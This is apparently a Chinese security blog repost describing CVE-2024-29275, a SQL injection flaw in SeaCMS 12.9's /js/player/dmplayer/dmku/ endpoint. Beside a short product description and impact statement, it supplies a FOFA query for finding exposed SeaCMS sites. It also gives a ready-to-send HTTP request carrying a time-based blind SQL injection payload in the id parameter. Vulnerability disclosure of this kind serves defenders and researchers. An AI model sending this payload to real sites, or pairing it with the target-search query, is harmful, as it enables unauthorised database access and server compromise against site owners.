海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

admin
admin
admin
137989
文章
113
评论
2024年6月14日17:57:57评论54 views字数 625阅读2分5秒阅读模式
「漏洞复现」海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

0x02
产品介绍
海洋CMS是一套专为不同需求的站长而设计的内容管理系统,灵活、方便、人性化设计、简单易用是最大的特色,可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发,完全开源免费 、无任何加密代码。
0x03
漏洞威胁
海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
影响范围:SeaCMS 12.9
0x04
漏洞环境
FOFA:

app="海洋CMS"

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

0x05
漏洞复现
POC

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

延时5秒

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)


原文始发于微信公众号(冷漠安全):「漏洞复现」海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月14日17:57:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)https://cn-sec.com/archives/2849337.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息